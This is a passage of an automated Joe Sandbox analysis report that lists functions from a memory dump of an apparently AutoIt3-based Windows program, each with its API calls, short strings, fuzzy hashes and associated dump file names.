                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2710830443-0
                                                                                                                                                                  • Opcode ID: 16cc1e4a7ccf43b5b4a5bf13d2ebb44913252b0b0fa88588f908250e2a91109c
                                                                                                                                                                  • Instruction ID: 9c0d31af5cff8ca105d100edf5ddf294b3ac1293ab1900fa5acb2216a820d63c
                                                                                                                                                                  • Opcode Fuzzy Hash: 16cc1e4a7ccf43b5b4a5bf13d2ebb44913252b0b0fa88588f908250e2a91109c
                                                                                                                                                                  • Instruction Fuzzy Hash: 90E01531A01268BADB201FA2FC0DEDB7F5CEB267A1F008010F60C85060CAF5A590CBA0
                                                                                                                                                                  Function 001FB0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSysColor.USER32(00000008), ref: 001FB0C5
                                                                                                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 001FB0CF
                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 001FB0E4
                                                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 001FB0EC
                                                                                                                                                                  • GetWindowDC.USER32(?,00000000), ref: 0025ECFA
                                                                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0025ED07
                                                                                                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 0025ED20
                                                                                                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 0025ED39
                                                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0025ED59
                                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0025ED64
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1946975507-0
                                                                                                                                                                  • Opcode ID: 07c25f25bf92d0567dcdcbdb72ffc5078fb324304e3c97150aebe263a9ebc3f1
                                                                                                                                                                  • Instruction ID: 577d53ce77b58ba6a0bda6ba9259faf8ffdfda825febca033591aeb3e4e39112
                                                                                                                                                                  • Opcode Fuzzy Hash: 07c25f25bf92d0567dcdcbdb72ffc5078fb324304e3c97150aebe263a9ebc3f1
                                                                                                                                                                  • Instruction Fuzzy Hash: F5E06D31A04248AEEF215F74BC4D7983B25AB16336F00C2A6FB6A580E2C3F18684CB11
                                                                                                                                                                  Function 0025C0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                                                  • Opcode ID: d27cf708645ecadaf132dbc08fc6c520ba2c7d39c8f0ab69b4fe6d02b44ee467
                                                                                                                                                                  • Instruction ID: c0c6a1f934cf58b4cef99ea43b2df8704cd43ea22e9219524edcd0d98d819f9e
                                                                                                                                                                  • Opcode Fuzzy Hash: d27cf708645ecadaf132dbc08fc6c520ba2c7d39c8f0ab69b4fe6d02b44ee467
                                                                                                                                                                  • Instruction Fuzzy Hash: C9E046B1A00208EFDB005F70EC4CA697BE9EB4C361F21C405FD4A8B260EBF598818B50
                                                                                                                                                                  Function 0025C0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                                                  • Opcode ID: 0d4eed7879be28793de261ca378dbde1448264b78b50c2f81f0e80f9d5858cc9
                                                                                                                                                                  • Instruction ID: 30443d78077229e0d3f824ef84a9ea575ebd8e575d8b75e0b660e1f0fcfb8f91
                                                                                                                                                                  • Opcode Fuzzy Hash: 0d4eed7879be28793de261ca378dbde1448264b78b50c2f81f0e80f9d5858cc9
                                                                                                                                                                  • Instruction Fuzzy Hash: 28E0B6B5A00248EFDB005F70EC4C6697BE9EB4C361F11C415FA4A8B261DBB999818B50
                                                                                                                                                                  Function 00262350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID: >$DEFINE
                                                                                                                                                                  • API String ID: 4104443479-1664449232
                                                                                                                                                                  • Opcode ID: 0cfc6d8278c475ca705f68bcfbce39230aa1c80b3b3cbfddcd664ee0254add43
                                                                                                                                                                  • Instruction ID: 597b7e2014fa491a0b39b927ee369e749e8de00e936806981ddd40305bc8cd97
                                                                                                                                                                  • Opcode Fuzzy Hash: 0cfc6d8278c475ca705f68bcfbce39230aa1c80b3b3cbfddcd664ee0254add43
                                                                                                                                                                  • Instruction Fuzzy Hash: CA129C74A1060ACFCF28CF59C880AADB7B1FF58314F25815AE809AB391D730ADD5CB90
                                                                                                                                                                  Function 0021EAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 0021ECA0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ContainedObject
                                                                                                                                                                  • String ID: AutoIt3GUI$Container
                                                                                                                                                                  • API String ID: 3565006973-3941886329
                                                                                                                                                                  • Opcode ID: e413c4b01678bde968d37565e0ef1df0aab27e126cfca39360c40d495aaffc9d
                                                                                                                                                                  • Instruction ID: f3eede47f34f46fcfd5340fc634fa27c185f58248dcd1e70d7b33c11f383df44
                                                                                                                                                                  • Opcode Fuzzy Hash: e413c4b01678bde968d37565e0ef1df0aab27e126cfca39360c40d495aaffc9d
                                                                                                                                                                  • Instruction Fuzzy Hash: 25914B70620701EFDB14CF64C884BAABBE9BF59710F15846DE84ACB691DBB0E891CB50
                                                                                                                                                                  Function 0022E704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E3BCF: _wcscpy.LIBCMT ref: 001E3BF2
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                  • __wcsnicmp.LIBCMT ref: 0022E785
                                                                                                                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0022E84E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                                  • String ID: LPT
                                                                                                                                                                  • API String ID: 3222508074-1350329615
                                                                                                                                                                  • Opcode ID: 2d8a63abbb02e5717d708cd84047d6a3ccce85b66cdb58a951a900b91c7a4f15
                                                                                                                                                                  • Instruction ID: 5938a15b6b2d83766197aae6a2596845eab546fbf5df989640e195709f042ac9
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d8a63abbb02e5717d708cd84047d6a3ccce85b66cdb58a951a900b91c7a4f15
                                                                                                                                                                  • Instruction Fuzzy Hash: EA61A075A20225AFCF14DF94D895EAEB7F4EF18310F0140A9F54AAB3A0DB70AE50DB51
                                                                                                                                                                  Function 001E1B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 001E1B83
                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 001E1B9C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                                                                  • Opcode ID: 1dcebfd20a5ca53f8f1dcd6caa8ff58930ac603108a5c16a956a46ae750a65b2
                                                                                                                                                                  • Instruction ID: a1cf5b8425eba4c412e698748d0263aadbecb93b6151d743dbe645d4ab9cb7ff
                                                                                                                                                                  • Opcode Fuzzy Hash: 1dcebfd20a5ca53f8f1dcd6caa8ff58930ac603108a5c16a956a46ae750a65b2
                                                                                                                                                                  • Instruction Fuzzy Hash: A1513A71408748ABE320AF54D889BAFBBECFFA9354F41484DF2C8410A5EB71956CC766
                                                                                                                                                                  Function 0022CE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E417D: __fread_nolock.LIBCMT ref: 001E419B
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0022CF49
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0022CF5C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscmp$__fread_nolock
                                                                                                                                                                  • String ID: FILE
                                                                                                                                                                  • API String ID: 4029003684-3121273764
                                                                                                                                                                  • Opcode ID: c206d80e3b3f6dd2b8dd119e1bdb6ba717b2019309f1d6d407df8ed4b564f00a
                                                                                                                                                                  • Instruction ID: ff374722d1d3c50c2ca1c244bafe5f38afb5fda5611c723f42499ee3262e8c15
                                                                                                                                                                  • Opcode Fuzzy Hash: c206d80e3b3f6dd2b8dd119e1bdb6ba717b2019309f1d6d407df8ed4b564f00a
                                                                                                                                                                  • Instruction Fuzzy Hash: C741E332A10219BBDF20DFE4DC85FEF7BBA9F59710F10046AF601A7191D771AA548B50
                                                                                                                                                                  Function 00209AF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0020889E: __getptd_noexit.LIBCMT ref: 0020889E
                                                                                                                                                                  • __getbuf.LIBCMT ref: 00209B8A
                                                                                                                                                                  • __lseeki64.LIBCMT ref: 00209BFA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                                                                                                  • String ID: pM!
                                                                                                                                                                  • API String ID: 3311320906-2718863444
                                                                                                                                                                  • Opcode ID: 51a28e759745e853d13cfed70b6331ade6b3a302e5bafa79af8d2f54f5f08201
                                                                                                                                                                  • Instruction ID: ec675e5160cc98e924b2e73376f35e71154f4169639e2ec28ebbf64616159e08
                                                                                                                                                                  • Opcode Fuzzy Hash: 51a28e759745e853d13cfed70b6331ade6b3a302e5bafa79af8d2f54f5f08201
                                                                                                                                                                  • Instruction Fuzzy Hash: 4241E271920B069EE734DF28D891A7A77D89B49334F14C61EE4AB872D3D774D8A08F50
                                                                                                                                                                  Function 0024A578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0024A668
                                                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0024A67D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID: '
                                                                                                                                                                  • API String ID: 3850602802-1997036262
                                                                                                                                                                  • Opcode ID: 2007b9d6162289eadeb05d0ab55a6e7fa9bb1d3f9b5770fb2aeb18edacc0d424
                                                                                                                                                                  • Instruction ID: 2f5a55767b7a34d7fd8590412c089538e39c9e268b0b4b1d037e3c72b57a756f
                                                                                                                                                                  • Opcode Fuzzy Hash: 2007b9d6162289eadeb05d0ab55a6e7fa9bb1d3f9b5770fb2aeb18edacc0d424
                                                                                                                                                                  • Instruction Fuzzy Hash: 4C412775E5020A9FDF18CF68D980BDA7BB9FB09300F15406AE905EB381D770A961CFA1
                                                                                                                                                                  Function 00249567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 0024961B
                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00249657
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$DestroyMove
                                                                                                                                                                  • String ID: static
                                                                                                                                                                  • API String ID: 2139405536-2160076837
                                                                                                                                                                  • Opcode ID: 4f0c7b10f153d2def1b0702dad3c5328b830fb22d662f91570c5dc572c78a3d0
                                                                                                                                                                  • Instruction ID: b15038085a037a5498be95eeee1f229e1846f04c936444f16fd81dc1332c74a3
                                                                                                                                                                  • Opcode Fuzzy Hash: 4f0c7b10f153d2def1b0702dad3c5328b830fb22d662f91570c5dc572c78a3d0
                                                                                                                                                                  • Instruction Fuzzy Hash: CD31AB31510209AEEB149F68DC80BBB77ACFF58764F118619F9A9C7190CB71ACA1DB60
                                                                                                                                                                  Function 00225B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 00225BE4
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00225C1F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                                                  • Opcode ID: 51e8d583a4c2c3e79bdd2aafe365b1dfdacd62293ff9d2b6c00d61c11d6dc4d2
                                                                                                                                                                  • Instruction ID: f88ff3074727abc1d1785454c633100aaccaeedf3de5d7c0f7acf25536bbe443
                                                                                                                                                                  • Opcode Fuzzy Hash: 51e8d583a4c2c3e79bdd2aafe365b1dfdacd62293ff9d2b6c00d61c11d6dc4d2
                                                                                                                                                                  • Instruction Fuzzy Hash: 6B31AC31510736BBDB248FD4E885BDDB7F8EF45350F18801AE98596191F7B09964CF11
                                                                                                                                                                  Function 00236B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __snwprintf.LIBCMT ref: 00236BDD
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
